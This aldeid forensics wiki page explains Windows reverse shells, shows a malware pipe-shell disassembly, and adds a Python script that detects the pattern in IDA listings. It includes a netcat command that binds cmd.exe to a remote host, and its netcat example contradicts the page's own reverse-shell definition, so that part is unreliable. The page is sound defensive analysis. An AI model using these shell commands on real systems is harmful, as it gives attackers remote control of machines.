Category:Digital-Forensics/Backdoors/Reverse-Shell

From aldeid

Reverse shell

A reverse shell is a shell initiated by the infected machine that offers remote access to the attacker. Netcat or Socat can be used for this purpose:

  • Infected machine: the below command opens a socket and waits for remote connections:
C:\> nc -l -p 80
  • Connection: the attacker connects to the infected machine:
C:\> nc 1.2.3.4 80 -e cmd.exe

Windows Reverse Shell

Malware can implement a Windows reverse shell by invoking the cmd.exe command with CreateProcess. The presence of CreateThread and CreatePipe could indicate a multithreaded Windows remote shell.

Basic

  • Call to CreateProcess, with manipulation of the STARTUPINFO structure passed to it.
  • Socket created and connection to remote server established
  • Socket tied to the standard streams (stdin, stdout, stderr) for cmd.exe
  • CreateProcess starts cmd.exe with window hidden

Multithreaded

  • Creation of a socket, two pipes (CreatePipe) and two threads (CreateThread creates one thread that reads from the stdin pipe and one that writes to the stdout pipe)
  • CreatePipe is used to obtain the read/write ends of each pipe
  • CreateProcess ties the standard streams of cmd.exe to the pipes instead of directly to the socket
Note
Data transmitted through the pipes is often encrypted.

Example

.text:00401262                 mov     esi, ds:CreatePipe
.text:00401268                 lea     ecx, [esp+1ACh+PipeAttributes]
.text:0040126C                 push    ecx             ; lpPipeAttributes
.text:0040126D                 push    edx             ; hWritePipe
.text:0040126E                 push    ebx             ; hReadPipe
.text:0040126F                 call    esi ; CreatePipe
.text:00401271                 lea     ecx, [esp+1A8h+PipeAttributes]
.text:00401275                 lea     eax, [ebx+4]
.text:00401278                 push    ebp             ; nSize
.text:00401279                 push    ecx             ; lpPipeAttributes
.text:0040127A                 lea     edx, [esp+1B0h+hReadPipe]
.text:0040127E                 push    eax             ; hWritePipe
.text:0040127F                 push    edx             ; hReadPipe
.text:00401280                 call    esi ; CreatePipe
.text:00401282                 mov     [esp+1A8h+StartupInfo.cb], 44h
.text:0040128A                 mov     [esp+1A8h+StartupInfo.lpReserved], ebp
.text:0040128E                 mov     eax, [esp+1A8h+hWritePipe]
.text:00401292                 mov     [esp+1A8h+StartupInfo.lpTitle], ebp
.text:00401296                 mov     [esp+1A8h+StartupInfo.lpDesktop], ebp
.text:0040129A                 mov     [esp+1A8h+StartupInfo.dwYSize], ebp
.text:0040129E                 mov     [esp+1A8h+StartupInfo.dwXSize], ebp
.text:004012A2                 mov     [esp+1A8h+StartupInfo.dwY], ebp
.text:004012A6                 mov     [esp+1A8h+StartupInfo.dwX], ebp
.text:004012AA                 mov     [esp+1A8h+StartupInfo.wShowWindow], bp
.text:004012AF                 mov     [esp+1A8h+StartupInfo.lpReserved2], ebp
.text:004012B3                 mov     [esp+1A8h+StartupInfo.cbReserved2], bp
.text:004012B8                 mov     [esp+1A8h+StartupInfo.dwFlags], 101h
.text:004012C0                 mov     [esp+1A8h+StartupInfo.hStdError], eax
.text:004012C7                 mov     [esp+1A8h+StartupInfo.hStdOutput], eax
.text:004012CE                 mov     eax, [esp+1A8h+hReadPipe]
.text:004012D2                 mov     esi, ds:GetCurrentProcess
.text:004012D8                 push    ebp             ; dwOptions
.text:004012D9                 push    1               ; bInheritHandle
.text:004012DB                 lea     ecx, [esp+1B0h+StartupInfo.hStdError]
.text:004012E2                 push    2               ; dwDesiredAccess
.text:004012E4                 push    ecx             ; lpTargetHandle
.text:004012E5                 mov     [esp+1B8h+StartupInfo.hStdInput], eax
.text:004012EC                 call    esi ; GetCurrentProcess
.text:004012EE                 mov     edx, [esp+1B8h+hWritePipe]
.text:004012F2                 push    eax             ; hTargetProcessHandle
.text:004012F3                 push    edx             ; hSourceHandle
.text:004012F4                 call    esi ; GetCurrentProcess
.text:004012F6                 push    eax             ; hSourceProcessHandle
.text:004012F7                 call    ds:DuplicateHandle
.text:004012FD                 mov     edi, offset aCmd_exe ; "cmd.exe"
.text:00401302                 or      ecx, 0FFFFFFFFh
.text:00401305                 xor     eax, eax
.text:00401307                 lea     edx, [esp+1A8h+CommandLine]
.text:0040130E                 repne scasb
.text:00401310                 not     ecx
.text:00401312                 sub     edi, ecx
.text:00401314                 mov     eax, ecx
.text:00401316                 mov     esi, edi
.text:00401318                 mov     edi, edx
.text:0040131A                 lea     edx, [esp+1A8h+StartupInfo]
.text:0040131E                 shr     ecx, 2
.text:00401321                 rep movsd
.text:00401323                 mov     ecx, eax
.text:00401325                 lea     eax, [esp+1A8h+CommandLine]
.text:0040132C                 and     ecx, 3
.text:0040132F                 rep movsb
.text:00401331                 lea     ecx, [esp+1A8h+ProcessInformation]
.text:00401338                 push    ecx             ; lpProcessInformation
.text:00401339                 push    edx             ; lpStartupInfo
.text:0040133A                 push    ebp             ; lpCurrentDirectory
.text:0040133B                 push    ebp             ; lpEnvironment
.text:0040133C                 push    ebp             ; dwCreationFlags
.text:0040133D                 push    1               ; bInheritHandles
.text:0040133F                 push    ebp             ; lpThreadAttributes
.text:00401340                 push    ebp             ; lpProcessAttributes
.text:00401341                 push    eax             ; lpCommandLine
.text:00401342                 push    ebp             ; lpApplicationName
.text:00401343                 call    ds:CreateProcessA
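The following Python script is an added triage example, not code from the aldeid page: it scans an IDA-style listing for the indicators described above under Basic and Multithreaded (CreatePipe/CreateThread calls, STARTUPINFO.dwFlags with STARTF_USESTDHANDLES, bInheritHandles=1 before CreateProcess, a "cmd.exe" string) and labels the pattern found. It assumes IDA's `call esi ; Name` / `call ds:Name` comment conventions and the `StartupInfo.dwFlags` field naming seen in the listing above; both sample listings are constructed inputs, the first retyped from a few lines of the example, the second an invented socket-handle variant.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Real Win32 STARTUPINFO.dwFlags bits; 101h in the listing above is their OR.
STARTF_USESHOWWINDOW = 0x0001
STARTF_USESTDHANDLES = 0x0100

SOCKET_APIS = {"socket", "WSASocketA", "WSASocketW", "connect", "WSAConnect"}
PROCESS_APIS = {"CreateProcessA", "CreateProcessW"}

# Constructed sample input: a handful of lines retyped from the CreatePipe /
# CreateProcessA sequence shown above (not the complete listing).
SAMPLE_PIPE_LISTING = """\
.text:00401262                 mov     esi, ds:CreatePipe
.text:0040126F                 call    esi ; CreatePipe
.text:00401280                 call    esi ; CreatePipe
.text:004012B8                 mov     [esp+1A8h+StartupInfo.dwFlags], 101h
.text:004012D9                 push    1               ; bInheritHandle
.text:004012F7                 call    ds:DuplicateHandle
.text:004012FD                 mov     edi, offset aCmd_exe ; "cmd.exe"
.text:0040133D                 push    1               ; bInheritHandles
.text:00401343                 call    ds:CreateProcessA
"""

# Constructed sample of the "Basic" variant: socket handles handed straight to
# cmd.exe, no pipes. Addresses and API order are invented for illustration.
SAMPLE_SOCKET_LISTING = """\
.text:00402000                 call    ds:WSASocketA
.text:00402010                 call    ds:connect
.text:00402020                 mov     [esp+1A8h+StartupInfo.dwFlags], 101h
.text:00402030                 push    1               ; bInheritHandles
.text:00402040                 call    ds:CreateProcessA
"""

CALL_RE = re.compile(r"\bcall\s+(?:ds:(\w+)|\w+\s*;\s*(\w+))")
FLAGS_RE = re.compile(r"StartupInfo\.dwFlags\],\s*(\w+)")
INHERIT_RE = re.compile(r"\bpush\s+(\w+)\s*;\s*bInheritHandles\b")
STRING_RE = re.compile(r'"([^"]*)"')


@dataclass
class ShellIndicators:
    calls: List[str] = field(default_factory=list)   # API names in call order
    startup_flags: Optional[int] = None               # value stored in dwFlags
    inherit_handles: Optional[str] = None             # bInheritHandles operand
    strings: List[str] = field(default_factory=list)  # string literals in comments


def ida_imm(token: str) -> int:
    """Convert an IDA immediate (44h, 101h, 0FFFFFFFFh or plain decimal) to int."""
    return int(token[:-1], 16) if token.lower().endswith("h") else int(token, 0)


def parse_listing(text: str) -> ShellIndicators:
    """Pull the remote-shell indicators out of an IDA-style listing."""
    ind = ShellIndicators()
    for line in text.splitlines():
        if m := CALL_RE.search(line):
            ind.calls.append(m.group(1) or m.group(2))
        if m := FLAGS_RE.search(line):
            ind.startup_flags = ida_imm(m.group(1))
        if m := INHERIT_RE.search(line):
            ind.inherit_handles = m.group(1)
        if m := STRING_RE.search(line):
            ind.strings.append(m.group(1))
    return ind


def classify(ind: ShellIndicators) -> dict:
    """Map the extracted indicators onto the Basic / Multithreaded patterns."""
    flags = ind.startup_flags or 0
    pipes = ind.calls.count("CreatePipe")
    threads = ind.calls.count("CreateThread")
    spawns = any(c in PROCESS_APIS for c in ind.calls)
    sockets = any(c in SOCKET_APIS for c in ind.calls)
    std_handles = bool(flags & STARTF_USESTDHANDLES)
    # The child only talks over the supplied handles if it both inherits them
    # (bInheritHandles=1) and is told to use them (STARTF_USESTDHANDLES).
    redirected = spawns and std_handles and ind.inherit_handles == "1"
    if redirected and pipes >= 2 and threads >= 1:
        verdict = "multithreaded-pipe-shell"
    elif redirected and pipes >= 1:
        verdict = "pipe-shell"
    elif redirected and sockets:
        verdict = "socket-shell"
    else:
        verdict = "no-shell-pattern"
    return {
        "verdict": verdict,
        "create_pipe_calls": pipes,
        "create_thread_calls": threads,
        "redirects_std_handles": std_handles,
        "uses_show_window": bool(flags & STARTF_USESHOWWINDOW),
        "inherit_handles": ind.inherit_handles,
        "command_line": next((s for s in ind.strings if "cmd" in s.lower()), None),
    }


if __name__ == "__main__":
    for name, text in (("pipe", SAMPLE_PIPE_LISTING), ("socket", SAMPLE_SOCKET_LISTING)):
        print(name, classify(parse_listing(text)))
```

On the retyped excerpt the script reports two CreatePipe calls, STARTF_USESTDHANDLES and STARTF_USESHOWWINDOW both set, bInheritHandles pushed as 1 and the "cmd.exe" string, and labels it a pipe-based shell; the excerpt contains no CreateThread call, so the multithreaded label is only produced once the thread-creation code is in the scanned region. The `uses_show_window` flag alone does not prove a hidden window: the listing stores `bp` into wShowWindow, and whether that is SW_HIDE depends on the value ebp holds at that point.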
